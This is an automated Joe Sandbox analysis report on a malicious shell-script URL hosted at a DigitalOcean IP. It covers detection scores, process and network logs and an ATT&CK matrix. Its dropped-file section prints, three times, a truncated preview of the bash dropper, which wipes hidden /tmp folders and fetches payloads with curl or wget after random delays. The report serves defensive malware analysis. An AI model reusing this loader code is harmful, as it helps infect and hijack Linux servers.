Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://161.35.236.24/tddwrt7s.sh

Overview

General Information

Sample URL:http://161.35.236.24/tddwrt7s.sh
Analysis ID:756099
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file

Classification

  • System is w10x64
  • chrome.exe (PID: 5984 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 3252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1736,i,4749182345959288231,17743984452233168257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 5192 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "http://161.35.236.24/tddwrt7s.sh MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://161.35.236.24/tddwrt7s.shAvira URL Cloud: detection malicious, Label: malware
Source: http://161.35.236.24/tddwrt7s.shVirustotal: Detection: 10%Perma Link
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tddwrt7s.sh HTTP/1.1Host: 161.35.236.24Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: accounts.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: unknownTCP traffic detected without corresponding DNS query: 161.35.236.24
Source: classification engineClassification label: mal56.win@25/3@5/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1736,i,4749182345959288231,17743984452233168257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://161.35.236.24/tddwrt7s.sh
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1736,i,4749182345959288231,17743984452233168257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\144431e0-e111-4e5a-ac50-52e448af83b2.tmpJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath Interception1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://161.35.236.24/tddwrt7s.sh11%VirustotalBrowse
http://161.35.236.24/tddwrt7s.sh100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
accounts.google.com
172.217.168.45
truefalse
    high
    www.google.com
    172.217.168.36
    truefalse
      high
      clients.l.google.com
      142.250.203.110
      truefalse
        high
        clients2.google.com
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
            high
            https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
              high
              http://161.35.236.24/tddwrt7s.shtrue
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                172.217.168.45
                accounts.google.comUnited States
                15169GOOGLEUSfalse
                172.217.168.36
                www.google.comUnited States
                15169GOOGLEUSfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                142.250.203.110
                clients.l.google.comUnited States
                15169GOOGLEUSfalse
                161.35.236.24
                unknownUnited States
                14061DIGITALOCEAN-ASNUSfalse
                IP
                192.168.2.1
                127.0.0.1
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756099
                Start date and time:2022-11-29 16:33:59 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 1s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:browseurl.jbs
                Sample URL:http://161.35.236.24/tddwrt7s.sh
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal56.win@25/3@5/7
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 172.217.168.67, 34.104.35.123
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, edgedl.me.gvt1.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):1971
                Entropy (8bit):3.986597754915752
                Encrypted:false
                SSDEEP:48:ppfabKDe5RMB/wBBABSgBtYBHOgB8gBQ8mf+:ppfLDe54WMxQHFncf+
                MD5:D888F3F4EA853CCC72E886EEF14FAB4A
                SHA1:94F3E73B77F0C358964DA2C8D478D536D6FCCF18
                SHA-256:94A40CAC3AE5C0FBA460A7FB7A8BFECFE2100A939C774ED963930B427A2A74C7
                SHA-512:FD0577233076EB800C8C90B677121E5F97CBF55AADC6B823635D92F4C31752938273056436F523A76BD8CE7B48E920F9AC6DF1F133124950F314E403F45053F7
                Malicious:false
                Reputation:low
                Preview:#!/bin/bash.if [ -d "/tmp/.X2k6-unix/.rsync/c" ]; then. cat /tmp/.X2k6-unix/.rsync/initall | bash 2>1&. exit 0.else. cd /tmp. rm -rf .ssh. rm -rf .mountfs. rm -rf .X2*. rm -rf .X3*..rm -rf .X19-unix*. rm -rf .X21-unix*. rm -rf .X22-unix*. rm -rf .X23-unix. rm -rf .X25-unix. mkdir .X2k6-unix. cd .X2k6-unix. RANGE=6. s=$RANDOM. let "s %= $RANGE".if [ $s == 0 ]; then. sleep $[ ( $RANDOM % 500 ) + 15 ]s. curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1. fi.if [ $s == 1 ]; then. sleep $[ ( $RANDOM % 500 ) + 5 ]s. curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2. fi.if [ $s == 2 ]; then. sleep $[ ( $RANDOM % 500 ) + 25 ]s. curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-cert
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):1971
                Entropy (8bit):3.986597754915752
                Encrypted:false
                SSDEEP:48:ppfabKDe5RMB/wBBABSgBtYBHOgB8gBQ8mf+:ppfLDe54WMxQHFncf+
                MD5:D888F3F4EA853CCC72E886EEF14FAB4A
                SHA1:94F3E73B77F0C358964DA2C8D478D536D6FCCF18
                SHA-256:94A40CAC3AE5C0FBA460A7FB7A8BFECFE2100A939C774ED963930B427A2A74C7
                SHA-512:FD0577233076EB800C8C90B677121E5F97CBF55AADC6B823635D92F4C31752938273056436F523A76BD8CE7B48E920F9AC6DF1F133124950F314E403F45053F7
                Malicious:false
                Reputation:low
                Preview:#!/bin/bash.if [ -d "/tmp/.X2k6-unix/.rsync/c" ]; then. cat /tmp/.X2k6-unix/.rsync/initall | bash 2>1&. exit 0.else. cd /tmp. rm -rf .ssh. rm -rf .mountfs. rm -rf .X2*. rm -rf .X3*..rm -rf .X19-unix*. rm -rf .X21-unix*. rm -rf .X22-unix*. rm -rf .X23-unix. rm -rf .X25-unix. mkdir .X2k6-unix. cd .X2k6-unix. RANGE=6. s=$RANDOM. let "s %= $RANGE".if [ $s == 0 ]; then. sleep $[ ( $RANDOM % 500 ) + 15 ]s. curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1. fi.if [ $s == 1 ]; then. sleep $[ ( $RANDOM % 500 ) + 5 ]s. curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2. fi.if [ $s == 2 ]; then. sleep $[ ( $RANDOM % 500 ) + 25 ]s. curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-cert
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Bourne-Again shell script, ASCII text executable
                Category:dropped
                Size (bytes):1971
                Entropy (8bit):3.986597754915752
                Encrypted:false
                SSDEEP:48:ppfabKDe5RMB/wBBABSgBtYBHOgB8gBQ8mf+:ppfLDe54WMxQHFncf+
                MD5:D888F3F4EA853CCC72E886EEF14FAB4A
                SHA1:94F3E73B77F0C358964DA2C8D478D536D6FCCF18
                SHA-256:94A40CAC3AE5C0FBA460A7FB7A8BFECFE2100A939C774ED963930B427A2A74C7
                SHA-512:FD0577233076EB800C8C90B677121E5F97CBF55AADC6B823635D92F4C31752938273056436F523A76BD8CE7B48E920F9AC6DF1F133124950F314E403F45053F7
                Malicious:false
                Reputation:low
                Preview:#!/bin/bash.if [ -d "/tmp/.X2k6-unix/.rsync/c" ]; then. cat /tmp/.X2k6-unix/.rsync/initall | bash 2>1&. exit 0.else. cd /tmp. rm -rf .ssh. rm -rf .mountfs. rm -rf .X2*. rm -rf .X3*..rm -rf .X19-unix*. rm -rf .X21-unix*. rm -rf .X22-unix*. rm -rf .X23-unix. rm -rf .X25-unix. mkdir .X2k6-unix. cd .X2k6-unix. RANGE=6. s=$RANDOM. let "s %= $RANGE".if [ $s == 0 ]; then. sleep $[ ( $RANDOM % 500 ) + 15 ]s. curl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1. fi.if [ $s == 1 ]; then. sleep $[ ( $RANDOM % 500 ) + 5 ]s. curl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2. fi.if [ $s == 2 ]; then. sleep $[ ( $RANDOM % 500 ) + 25 ]s. curl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-cert
                No static file info
                TimestampSource PortDest PortSource IPDest IP
                Nov 29, 2022 16:35:00.100644112 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.100717068 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.100805998 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.101274967 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.101305962 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.162326097 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.193486929 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.193520069 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.194263935 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.194369078 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.195614100 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.195724964 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.324287891 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.324348927 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.324440956 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.324866056 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.324887991 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.390580893 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.410413980 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.410465002 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.414151907 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.414305925 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.558176994 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.558233976 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.558465958 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.558835030 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.558871031 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.559226036 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.559250116 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.559412003 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.559592009 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.559603930 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.595918894 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.596086979 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.596117020 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.596152067 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.596215010 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.602296114 CET49714443192.168.2.6142.250.203.110
                Nov 29, 2022 16:35:00.602349043 CET44349714142.250.203.110192.168.2.6
                Nov 29, 2022 16:35:00.613711119 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.613843918 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.613869905 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.614006042 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.614084005 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.616519928 CET49715443192.168.2.6172.217.168.45
                Nov 29, 2022 16:35:00.616545916 CET44349715172.217.168.45192.168.2.6
                Nov 29, 2022 16:35:00.808432102 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:00.897489071 CET4971880192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:00.983395100 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:00.983593941 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:00.988480091 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:01.073004961 CET8049718161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:01.073230982 CET4971880192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:01.170819998 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:01.170974016 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:01.171031952 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:01.171106100 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:03.516519070 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.516578913 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.516710043 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.517039061 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.517055035 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.584866047 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.585433960 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.585474014 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.587670088 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.587774992 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.598562002 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.598594904 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.598968029 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.664697886 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:03.664736032 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:03.764743090 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:13.555876017 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:13.556006908 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:13.556154013 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:16.783726931 CET49721443192.168.2.6172.217.168.36
                Nov 29, 2022 16:35:16.783793926 CET44349721172.217.168.36192.168.2.6
                Nov 29, 2022 16:35:46.106399059 CET4971880192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:46.184499979 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:35:46.283468962 CET8049718161.35.236.24192.168.2.6
                Nov 29, 2022 16:35:46.359201908 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:36:01.307733059 CET8049718161.35.236.24192.168.2.6
                Nov 29, 2022 16:36:01.307945967 CET4971880192.168.2.6161.35.236.24
                Nov 29, 2022 16:36:03.517405033 CET4971880192.168.2.6161.35.236.24
                Nov 29, 2022 16:36:03.517930984 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.517986059 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.518089056 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.520988941 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.521023035 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.580590963 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.623608112 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.636317968 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.636352062 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.637125969 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.637787104 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.637814045 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.637933969 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:03.686017036 CET49752443192.168.2.6172.217.168.36
                Nov 29, 2022 16:36:03.693810940 CET8049718161.35.236.24192.168.2.6
                Nov 29, 2022 16:36:06.163091898 CET8049717161.35.236.24192.168.2.6
                Nov 29, 2022 16:36:06.163274050 CET4971780192.168.2.6161.35.236.24
                Nov 29, 2022 16:36:13.573272943 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:13.573369026 CET44349752172.217.168.36192.168.2.6
                Nov 29, 2022 16:36:13.573627949 CET49752443192.168.2.6172.217.168.36
                TimestampSource PortDest PortSource IPDest IP
                Nov 29, 2022 16:34:59.960948944 CET5950453192.168.2.68.8.8.8
                Nov 29, 2022 16:34:59.962482929 CET6519853192.168.2.68.8.8.8
                Nov 29, 2022 16:34:59.981652021 CET53651988.8.8.8192.168.2.6
                Nov 29, 2022 16:34:59.986195087 CET53595048.8.8.8192.168.2.6
                Nov 29, 2022 16:35:03.280540943 CET5490353192.168.2.68.8.8.8
                Nov 29, 2022 16:35:03.298038960 CET53549038.8.8.8192.168.2.6
                Nov 29, 2022 16:35:03.309571981 CET5153053192.168.2.68.8.8.8
                Nov 29, 2022 16:35:03.336733103 CET53515308.8.8.8192.168.2.6
                Nov 29, 2022 16:36:03.452083111 CET5975253192.168.2.68.8.8.8
                Nov 29, 2022 16:36:03.469834089 CET53597528.8.8.8192.168.2.6
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 29, 2022 16:34:59.960948944 CET192.168.2.68.8.8.80x643Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                Nov 29, 2022 16:34:59.962482929 CET192.168.2.68.8.8.80xd4a0Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                Nov 29, 2022 16:35:03.280540943 CET192.168.2.68.8.8.80xfd1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                Nov 29, 2022 16:35:03.309571981 CET192.168.2.68.8.8.80x17ceStandard query (0)www.google.comA (IP address)IN (0x0001)false
                Nov 29, 2022 16:36:03.452083111 CET192.168.2.68.8.8.80xe98dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 29, 2022 16:34:59.981652021 CET8.8.8.8192.168.2.60xd4a0No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                Nov 29, 2022 16:34:59.981652021 CET8.8.8.8192.168.2.60xd4a0No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                Nov 29, 2022 16:34:59.986195087 CET8.8.8.8192.168.2.60x643No error (0)accounts.google.com172.217.168.45A (IP address)IN (0x0001)false
                Nov 29, 2022 16:35:03.298038960 CET8.8.8.8192.168.2.60xfd1No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)false
